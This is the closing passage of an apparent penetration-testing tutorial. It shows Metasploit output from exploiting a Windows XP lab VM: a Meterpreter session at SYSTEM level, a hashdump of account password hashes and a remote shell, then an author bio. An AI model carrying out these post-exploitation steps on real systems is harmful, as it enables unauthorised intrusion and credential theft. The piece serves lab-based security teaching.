[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (751104 bytes) to 192.168.56.103

[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > sysinfo

Computer : WINDOWSX-C7B000

OS : Windows XP (Build 2600, Service Pack 2).

Architecture : x86

System Language : en_US

Meterpreter : x86/win32

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::

IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::

IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::

windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

meterpreter > shell

Process 1908 created.

Channel 1 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>systeminfo

systeminfo

Host Name: WINDOWSX-C7B000

OS Name: Microsoft Windows XP Professional

OS Version: 5.1.2600 Service Pack 2 Build 2600

OS Manufacturer: Microsoft Corporation

OS Configuration: Standalone Workstation

OS Build Type: Uniprocessor Free

Registered Owner: windowsxp

Registered Organization:

Product ID: 76487-640-8365391-23703

Original Install Date: 6/10/2013, 1:02:40 PM

System Up Time: 0 Days, 2 Hours, 4 Minutes, 1 Seconds

System Manufacturer: innotek GmbH

System Model: VirtualBox

System type: X86-based PC

Processor(s): 1 Processor(s) Installed.

[01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz

BIOS Version: VBOX - 1

Windows Directory: C:WINDOWS

System Directory: C:WINDOWSsystem32

Boot Device: DeviceHarddiskVolume1

System Locale: en-us;English (United States)

Input Locale: en-us;English (United States)

Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk

Total Physical Memory: 511 MB

Available Physical Memory: 370 MB

Virtual Memory: Max Size: 2,048 MB

Virtual Memory: Available: 2,009 MB

Virtual Memory: In Use: 39 MB

Page File Location(s): C:pagefile.sys

Domain: WORKGROUP

Logon Server: N/A

Hotfix(s): 1 Hotfix(s) Installed.

[01]: Q147222

NetWork Card(s): 1 NIC(s) Installed.

[01]: AMD PCNET Family PCI Ethernet Adapter

Connection Name: Local Area Connection

DHCP Enabled: No

IP address(es)

[01]: 192.168.56.103

[/c]

Conclusion

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

There are a lot of ways and things we can do to enumerate and exploit vulnerable web-apps or services. This tutorial describes the basic things we can do to gather important information and exploit the most known vulnerable services using a couple of ways. The best secure way is to try every parameter on a virtual environment, before proceeding to run every of the above example, to real machine Servers with authorized access by the admin.

Fotis Liatsis
Fotis Liatsis

Fotis Liatsis is an undergraduate at Technological Educational Institute of Larissa, department of Computer Science and Telecommunications. He is also a member and System/Network Administrator of Greek Student Security Team - CampSec. Fotis is an OWASP member of the Greek Student Chapter, System Administrator of Hackademic and also a member of the Digital Awareness and Reinforcement of Trust (D.A.R.T. NGO) team. His interests include Ethical Hacking, Penetration Testing, Security/vulnerability research and applied Cryptography methods.

He is a security enthusiast and Athcon fanatic. You can follow his Twitter (@liatsisfotis) or his blog for more information (http://www.liatsisfotis.com/)